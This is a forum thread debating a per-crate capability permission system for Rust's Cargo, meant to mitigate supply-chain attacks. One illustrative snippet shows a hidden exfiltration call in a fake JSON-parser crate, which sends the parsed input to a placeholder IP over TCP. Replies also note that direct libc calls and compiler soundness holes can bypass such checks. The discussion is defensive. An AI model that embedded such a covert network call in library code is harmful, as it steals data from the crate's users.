Regarding the Security / Safety of Libraries on Crates.io

There isn't any system in place to prevent the sort of issues that reddit is talking about, is there?

If that's the case, what prevents us from adopting a Deno-like approach, where each and every crate is granted explicit permission to do only what it's supposed to do?

It wouldn't require any breaking changes, just a few additional keys in the .toml file:

[dependencies.tokio]
version = "1"
features = [ "full" ]
permissions = [ "full" ]
# broken down into "none" for simple functions,
# "fs" for file system access, "net" for sockets,
# "web-full" for access to all web sites & resources,
# "domain:youtube.com" for YouTube libraries, etc.

One of the posts in that thread covered quite succinctly why these problems keep reappearing: it's just not realistic to expect people to do more work for the same amount of benefit. So why don't we give everyone a better (and safer, not only in terms of memory this time) option?

A global permission specifier wouldn't hurt either:

[dependencies.all]  # applicable to all used crates
permissions = [ "fs" ]

Some previous discussion, with the first reply linking to several more relevant threads: About supply-chain attacks - Rust Internals. I'm not sure whether there have been any developments since then. I haven't seen anyone say that this can't be done, mainly concerns that it may be difficult to do in a robust manner.

See also GitHub - bytecodealliance/cap-std: Capability-oriented version of the Rust standard library

This would require some kind of additional run-time instrumentation of the compiled artifacts, right? That sounds like a non-starter to me for a systems programming language, in addition to being a lot of engineering work.

1 Like

Awesome, so it's been on the mind of some people before - good to know.

Great approach, quite similar to Deno by the looks of it. But expecting people to switch to a more security-oriented version of the standard library just because it's safe most likely isn't going to have the desired effect. Unless it gets adopted by the language itself, it will simply remain "yet another security thing". Not to mention that just having a more secure standard library doesn't forbid anyone from introducing their own integrations with the underlying OS for their own purposes.

Not necessarily - all the checks can be done directly at compile-time.

First, we'd need to clarify and agree on the kinds of permissions we care about. Deno's approach might be a good start, but in Rust's case the addition of an "unsafe" permission, at the very least, is necessary, for obvious reasons. File system access and permission to access the web are essential as well.

Once that is done, the work would pass to the people responsible for the standard library, along with the maintainers of the most popular independent (async) alternatives - such as tokio and async-std.

Any function that can be used to read from the file system would get either a comment or an attribute (procedural macro) of this kind: #[requires(fs_read)]. Any function that can access the web: #[requires(web)], and so on. These would get parsed at compile time and checked against the permissions specified in the .toml file. If the required permission isn't there, the whole body of the function could be replaced by a panic! with the details of the function call - and who called it in the first place.
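
A minimal sketch of what those annotations could look like, assuming a hypothetical requires attribute and the permission names from above - none of this exists today:

// Hypothetical: `requires` is not a real attribute; it stands in for whatever
// marker the compiler / cargo would actually recognize under this proposal.

#[requires(fs_read)]
pub fn read_to_string(path: &str) -> std::io::Result<String> {
    std::fs::read_to_string(path)
}

#[requires(web)]
pub fn fetch(addr: &str) -> std::io::Result<std::net::TcpStream> {
    std::net::TcpStream::connect(addr)
}

// If the calling crate's Cargo.toml doesn't grant "fs_read", the idea is that
// the body above gets swapped out for something like:
//
//     panic!("`read_to_string` requires the `fs_read` permission, \
//             called from crate `some_dependency`");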

Since unsafe code stands out on its own, no annotations are needed there - any unsafe call or function can thus be either removed or replaced by some version of panic! as well.

With that out of the way, there's no room left for anyone to exploit either the functionality of the standard library or its counterparts. You can steal all the passwords you want, but if neither the standard library nor tokio / async-std / smol / mio gives you a way to transmit them, you won't get anything from anyone - and the user will be alerted that something went wrong as soon as they try to compile, test and run their program, believing that your id-hashmap does, indeed, provide a better alternative to the standard library's HashMap<Uuid, T>.

Any code that is not annotated would implicitly be given #[requires(none)] - that is, it's a pure function that takes in some data and returns some back, nothing else. If you're writing a library and call some #[requires(fs_write)] function from the standard library inside such a function, you would get a warning at first and a compilation error afterwards. In time, this would force every crate author to explicitly specify which permissions their libraries need - and with static analysis any crate could be trivially scanned for annotations to make sure the crate author did their job properly.
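
For example, an unannotated library function that touches the file system might trip the check like this (the annotation scheme and the diagnostic text are, again, hypothetical):

// Implicitly #[requires(none)] under the proposal: no annotation, so the
// function is assumed to be pure computation.
pub fn cache_result(data: &str) -> std::io::Result<()> {
    // std::fs::write would itself carry #[requires(fs_write)] in this scheme,
    // so this call would first produce a warning, later a hard error:
    //
    //   warning: `cache_result` calls `std::fs::write` (requires `fs_write`)
    //            but is implicitly `#[requires(none)]`
    //   help: add `#[requires(fs_write)]` to `cache_result`
    std::fs::write("cache.txt", data)
}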

In the end, you have a security system enforced directly by the compiler - and specified explicitly by the end user of the libraries. No 2FA, no code reviews, no changes to crates.io needed. If you want to shoot yourself in the foot by allowing anything and everything to compile and run - that's your problem. The ecosystem gave you the best system possible; if you want to be dumb about it, it's your choice.

This is the kind of vision I have in mind. And I don't see that many downsides to it, aside from a somewhat tedious process of annotating, along with a few additional compiler checks. Heck, I know I'd be the first to use it straight away - but do let me know if I'm the only one here.

1 Like

What if you communicate with fs/web/peripherals/etc. via a binding to an external API the compiler cannot check?

What if you are on a Unix-like system, where a lot of things use the filesystem? (sockets, serial ports, tty, FIFO...)

Does it mean that any use of unsafe will make your program require every feature?

2 Likes

The problem is that this would automatically make all code that uses data structures transitively unsafe. It sounds like you're proposing to treat the standard library specially to avoid this, but it then means that you can't use any libraries like tokio or bindings to C libraries without granting full permissions, which is pretty much a nonstarter.

Edit: I see this is redundant with the last sentence of @tuxmain's post.

1 Like

I'd be surprised if you can sandbox Rust code without literally sandboxing the build process. The Rust language itself was not designed for it and I'm not sure adding attributes will prevent clever workarounds.

See also: sandboxing Java applets within the browser. Or pysandbox.

I mean, I'm not against trying to do this but it'd be a big project and hard to get right. Personally I just think it'd be more fruitful to pursue proper OS sandboxing and having more ways to avoid build scripts (e.g. purpose built configuration files with security in mind).

4 Likes

The compiler can't check it - but you can declare whether the operation that's about to happen touches the file system, the web or anything else, and whoever uses your crate will need to explicitly state that they want to give your library permission to use those bindings. This would also simplify the review process for anyone interested in verifying the bindings' functionality later on.
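
In other words, the binding author would be on the hook for declaring what the foreign code touches. A rough sketch, with a made-up C function and the hypothetical requires attribute from earlier:

// The compiler can't see what the C side does, so the declared permission is a
// promise made by the binding author. `c_lib_save` is a made-up external
// function; in practice it would come from some -sys crate.
#[requires(fs_write)]
pub fn save_via_c_library(path: &str, data: &[u8]) -> bool {
    extern "C" {
        fn c_lib_save(path_ptr: *const u8, path_len: usize, data_ptr: *const u8, data_len: usize) -> i32;
    }
    unsafe { c_lib_save(path.as_ptr(), path.len(), data.as_ptr(), data.len()) == 0 }
}

Nothing forces that declaration to be accurate, of course, which is exactly what the review mentioned above would have to check.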

Same thing, doesn't make any difference - as long as you specify what the requirements are, and the user of the library gives you these permissions, you're good to go.

Nope, it just means that only the libraries that need to use unsafe will be using unsafe. I probably should have expanded a bit more, so let me do that right now with a concrete example.


Say you're building a new console app. It starts off simple: you read some input from the user, save it, do something with it, and later print something back to the console. Basic I/O, nothing complicated, no access to the file system needed. You decide to import some library to parse the arguments provided to your app, using some new, fancier alternative to clap you've just found. You know it shouldn't access anything other than stdin/stdout, so you don't specify any permissions for it (basic I/O is too harmless to do anything damaging anyway). You compile your program, you run it - and it crashes.

Turns out your alternative was trying to write something to your file system. The panic! discussed previously gets called with the arguments of the function invoked by your new library - revealing that it was trying to create a key_log_and_crash.exe in your system32 folder by opening a new File handle. Would you have known about that with full permissions turned on?

Your program continues to grow. You decide to implement additional functionality, saving the user's input to a file - and you decide to import tokio for that. For it to be able to access your file system, you specify permissions = [ "fs" ] in your .toml - it compiles and it works.

Now another library comes along, claiming that it just parses the .json input it's given - and thus needs no permissions whatsoever. Great - you add it in, you run it, and you get another crash when it tries to establish a connection to a totally unsuspicious remote server by creating a TcpStream through tokio. Another potential security threat caught.
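
To make it concrete, the offending code inside that "JSON parser" might look something like this (made-up crate contents, documentation-range IP address); under the proposal, tokio's connect would carry a net/web requirement that this crate was never granted:

use serde_json::Value;
use tokio::io::AsyncWriteExt;
use tokio::net::TcpStream;

// What the "just a JSON parser" might actually ship. The hidden connection is
// the call that would trip the missing permission and panic (or fail to
// compile), naming this crate as the caller.
pub async fn parse(input: &str) -> serde_json::Result<Value> {
    let parsed: Value = serde_json::from_str(input)?;

    // Hidden behind the parsing API: ship the raw input off to a remote server.
    if let Ok(mut stream) = TcpStream::connect("203.0.113.7:4444").await {
        let _ = stream.write_all(input.as_bytes()).await;
    }

    Ok(parsed)
}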

A slightly more complex case: you decide to use a web framework now, based on tokio, which retrieves static files from a directory before serving them to the web. How do you handle this? It necessarily has to have permissions for both fs and web. How would you prevent it from reading what it shouldn't and sending it somewhere else? This is where an approach like Flutter's comes to the rescue: a separate configuration file listing the files and folders your app is allowed to access, automatically applied as a constraint to any library with fs_read / fs_write enabled. Should a call to any other file or directory occur - once again, a loud panic! ensues.
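
The enforcement side of that allow-list could boil down to a path check at the fs boundary. A rough sketch - how the list gets loaded from that separate config file, and where exactly the check would be injected into std / tokio, are open questions:

use std::path::{Path, PathBuf};

// Rough sketch of the path allow-list idea; assumes `allowed_roots` have
// already been canonicalized when loading the config file described above.
struct FsPolicy {
    allowed_roots: Vec<PathBuf>,
}

impl FsPolicy {
    fn permits(&self, requested: &Path) -> bool {
        // Canonicalize the request so `../` tricks can't escape the allowed roots.
        match requested.canonicalize() {
            Ok(real) => self.allowed_roots.iter().any(|root| real.starts_with(root)),
            Err(_) => false,
        }
    }
}

fn guarded_read(policy: &FsPolicy, path: &Path) -> std::io::Result<String> {
    if !policy.permits(path) {
        panic!("fs_read: `{}` is outside the paths granted to this crate", path.display());
    }
    std::fs::read_to_string(path)
}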

As for unsafe - there's nothing preventing you from allowing only tokio to call unsafe functions, while disallowing any other library from doing the same. If you say:

[dependencies]
not_a_hack_tool = "0.1.3"
# implicit: permissions = [ "none" ]

[dependencies.tokio]
version = "1"
features = [ "full" ]
permissions = [ "unsafe", "fs_read" ]

Then a few additional checks can verify at compile time that not_a_hack_tool never calls into the unsafe parts of tokio. If it does, we have a problem. And if any library does need to rely on the permissions of another library, then it should state that as well:

[dependencies.some_lib]
version = "0.1"

[dependencies.some_lib.permissions]
tokio = [ "unsafe", "fs_read" ]

This is what I had in mind - it's not about sandboxing, but clarity about what is allowed to happen.

I mean, Tokio has unsafe in pretty much every single component. Preventing other libs from using unsafe code in Tokio is not going to get you very far - you have to allow this to let them use Tokio at all.

8 Likes

Guess we're stuck with manual reviews that no one will bother with, then - don't know what else to tell you. I'll see what I can hack around with myself, but there must have been a reason why Ryan Dahl decided to move away from Node's way of doing things in favor of Deno. If we can't be bothered to analyze the mistakes of others and see what we can build on top of them, hey - maybe it wasn't meant to be. Let's wait until the next vulnerability pops up out of nowhere before having this conversation all over again - or not.

I mean, a variant of your suggestion is to say that not_a_hack_tool may not have any unsafe of its own, but is allowed to call code in Tokio that does.

2 Likes

There are different levels of unsafe-ness - you know that much better than I do. In the case of a library like tokio there could be an implicit permission to allow all things unsafe, but whoever happens to be calling tokio must rely only on its safe wrappers, that is:

#[requires(fs_read)]
fn tokio_read() {
  do_something();
  unsafe {
    os_interfacing();
    read_from_to(...);
  }
} // calling this is okay, with a `fs_read` permission

But the library relying on tokio shouldn't itself be making any unsafe calls of its own without explicit permissions - no declaring and no using unsafe functions in its own crate. That's what I meant.
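
So a crate depending on tokio, granted only fs_read, would be fine calling the tokio_read wrapper above, while any unsafe of its own would be rejected - roughly:

// Hypothetical dependent crate that was granted "fs_read" but not "unsafe".

pub fn load_settings() {
    tokio_read(); // fine: the unsafe lives inside tokio, which *was* granted "unsafe"
}

// Under the proposal this would be rejected at compile time, e.g.:
//   error: this crate uses `unsafe` but was not granted the "unsafe" permission
pub fn sneaky(ptr: *const u8) -> u8 {
    unsafe { *ptr } // dereferencing a raw pointer needs `unsafe`
}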

There are many ways you can approach the issue. Checking capabilities of libraries is one approach, and it has a bunch of technical challenges, but I'm sure you could find some sort of solution if you spend enough time on them. However, I'm not convinced that capabilities are the best solution. I think implementing mitigations that prevent unauthorized people from uploading malicious versions of libraries is a better strategy.

For example, here's one idea: There was an article earlier this month called Does the published crate match the upstream source?, which analyzed how often the published version of a crate actually corresponds to a specific commit in the repository. Imagine if crates.io had an automatic check when publishing a new version that the specified commit actually existed in the original repository, and also verified that the published code matches the commit. Then you need to compromise both the repository and the cargo publishing credentials to upload a malicious version.
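
A rough sketch of what such a publish-time check could run, assuming crates.io had a declared upstream commit to verify against (it has no such input today); the helper names and the exclusion list are assumptions:

use std::process::Command;

// Does the declared commit actually exist in a checkout of the upstream repo?
// `git cat-file -e <hash>^{commit}` exits 0 iff the object exists and is a commit.
fn commit_exists_upstream(repo_checkout: &str, commit: &str) -> bool {
    Command::new("git")
        .args(["-C", repo_checkout, "cat-file", "-e", &format!("{commit}^{{commit}}")])
        .status()
        .map(|status| status.success())
        .unwrap_or(false)
}

// Does the unpacked .crate match a `git archive` extraction of that commit?
// Files that `cargo package` adds or rewrites (the normalized Cargo.toml,
// Cargo.toml.orig, .cargo_vcs_info.json) are excluded here and would need a
// separate comparison.
fn sources_match(upstream_tree: &str, unpacked_crate_dir: &str) -> bool {
    Command::new("diff")
        .args([
            "-r",
            "-x", "Cargo.toml",
            "-x", "Cargo.toml.orig",
            "-x", ".cargo_vcs_info.json",
            "-x", "Cargo.lock",
            upstream_tree,
            unpacked_crate_dir,
        ])
        .status()
        .map(|status| status.success())
        .unwrap_or(false)
}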

6 Likes

The most readily available component of your suggestion is forbidding unsafe in dependencies. It's often been suggested (check the previous discussions). And one can argue the other constraints are meaningless if you have unsafe. But I don't think forbidding unsafe on dependencies at the project level mitigates the need for some sort of review.
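
For reference, the closest lever that exists today is the crate-level lint, and it only covers your own code - it doesn't reach into dependencies (tools like cargo-geiger can at least report on those), which is exactly the gap being discussed:

// src/main.rs of your own project: any `unsafe` in *this* crate is now a hard
// compile error. Dependencies are unaffected, which is the whole problem.
#![forbid(unsafe_code)]

fn main() {
    println!("no unsafe allowed in this crate");
}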

Let's say you turn this on. Uh oh, half your dependencies use unsafe. Now, maybe there's a cultural or ecosystem change that can take place over time to change this. But some of those uses are legit, and we can't delay our project a decade hoping for the situation to improve regardless.

Already you (still) have to at least marginally review your deps.

OK, tokio is everywhere, lots of core Rust maintainers, surely someone has reviewed it... allow tokio to use unsafe. I mean, our project heavily depends on it anyway, so...

Is this allowance transitive? If not... you'll have to review every transitive dependency, too. But if it is, and if any allowed crate has ua-browser-rs as a transitive dependency, you're still vulnerable.


I'm not arguing against more controls, but I don't think it gets you away from reviewing at all. I think tools to aid reviewing, like crev, are pretty crucial. Also worth mentioning is cargo audit, which adds a defensive layer even when reviewing is skimped on.

4 Likes

That's a given - and I do believe such mechanisms definitely should be put in place, but they rely on the ecosystem's intermediary package manager, not on the end user - who will still be forced to deal with the issue should any maliciousness slip through the cracks. Perhaps I'm a bit too hopeful about this, but giving the user of a crate the ability to forcibly shut down any functionality from any crate that doesn't conform to their expectations is a much safer, albeit more complex, alternative.

I've probably done quite a terrible job explaining myself - because my suggestion was never about the concerns with unsafe functionality. Dealing with memory in a potentially unsound way has very little to do with the most common exploits that are continuously introduced in all sorts of packages to this day.

Are people going to rely on unsafe system calls to bake a crypto-miner into a package? Will they make raw system calls in order to place the right kind of keylogger in the right place, for it to get activated at the right time? Or is it much likelier for them to rely on existing functions in the most popular crates to do whatever they'd like to do? This is what it boils down to.

To quote from the first link that @Heliozoa mentioned:

Summary
  • The threat model must assume that code can come from anybody, and libraries that accept code from unvetted strangers will outcompete libraries that only accept code after a rigorous vetting process (eg, I'm currently contributing to Raph Levien's druid; for all Raph knows, I'm a DGSE agent planted to introduce vulnerabilities in his code; Raph has done none of the thorough background checks that would be needed to prove this isn't the case; yet he's still taking my PRs).
  • The threat model must assume that people will be as lazy as they can afford to be when pulling dependencies. If people have a choice between a peer-reviewed dependency without the feature they need, and an unreviewed dependency with the feature, they will take the latter.
  • The threat model must assume that both attackers and legitimate developers can write code faster than people can review it.
  • The threat model must assume that some attackers will be sneaky and determined; if the ecosystem defends against supply chain attacks with heuristics, they will learn to game these heuristics. If the ecosystem only checks new crates for suspicious code, they will write non-suspicious code at first and add the actual vulnerability months later.

Introducing changes to crates.io doesn't deal with the issue. Removing all unsafe code is not practical. What remains is an explicit opt-in to specific functionality, allowed for specific crates. clap shouldn't issue any TCP requests to servers in India. A simple HTTP client shouldn't read any system files. All of these can (and, IMHO, should) be enabled explicitly, as long as we have a common model of reference to work with. If Deno can do it, Rust can do it as well. As for the reliance on tokio and other packages that are inherently unsafe - as long as there's an explicit opt-in for the specific functionality of tokio that is allowed for a particular crate, this isn't an issue either.

Will this solve all security issues? Definitely not. But as long as each and every dependency is only allowed the bare minimum it can work with, the risk of accidental exploits is several orders of magnitude lower and orchestrating a complex attack is too much of a hassle for most people to bother with.

1 Like

If crates are allowed to use unsafe code, they can just use inline assembly to do syscalls directly, bypassing any security mechanisms of the Rust standard library. Or they can just call into libc like this... Or they can introduce all kinds of easily exploitable vulnerabilities.
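
For illustration, the libc route needs nothing from std's I/O at all - a few lines on a Unix target with the libc crate as a dependency:

// Assuming the `libc` crate and a Unix target: this writes to stdout through
// the raw C function, never touching std's (hypothetically gated) I/O APIs.
fn main() {
    let msg = b"hello from libc, not from std\n";
    unsafe {
        // fd 1 is stdout; the same trick works for open(2), connect(2) and so on.
        libc::write(1, msg.as_ptr() as *const libc::c_void, msg.len());
    }
}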

So while this approach would make it a little bit harder to introduce exploits or vulnerabilities, it would not offer any real protection.

2 Likes

True - but how likely is that to happen if you have to give any unknown crate explicit permission to make those unsafe calls?

Forbidding unsafe code and requiring permission checks is ineffective for as long as rustc has soundness holes, as those allow you to write code that performs syscalls without the compiler knowing about it. There are currently 72 open issues labeled I-unsound: Issues · rust-lang/rust · GitHub. The oldest open soundness issue, for example, would allow transmuting an integer - such as the address of the syscall function in libc - into a function pointer that can be safely called: Collisions in type_id · Issue #10389 · rust-lang/rust · GitHub. As another example, unsoundness relating to WF requirements on trait object types · Issue #44454 · rust-lang/rust · GitHub allows transmuting a reference with a limited lifetime into one with a 'static lifetime, thus allowing a use-after-free, which can again be exploited to call into libc. These issues are very unlikely to be hit accidentally, so Rust does still provide a lot of safety over C/C++, but a malicious actor could easily exploit them.

9 Likes

I think the core problem here is that this still needs manual review of the bottom layer that actually provides these capabilities. There's no way to automatically verify that, when something is making syscalls, it's using only the syscalls associated with the correct permission. And of course, as soon as something has fs access, you end up wanting finer granularity than that, since you probably didn't want it reading arbitrary files. Not to mention that safety in the Rust sense isn't security: it's safe to delete all your files, and it's safe to upload your bitcoin wallet to pastebin.

What languages have succeeded in an in-language security model that lasted? Java and C# both tried but gave up, as I recall. I feel like making it the OS's responsibility -- Solaris Zones or whatever -- is the way forward (especially for anything that needs to call C code). Or maybe running in a limited environment like a WASM VM.

6 Likes

Java's motivation for removing permissions: JEP 411: Deprecate the Security Manager for Removal

C#'s deprecation notice: Breaking change: Most code access security APIs are obsolete - .NET | Microsoft Docs

3 Likes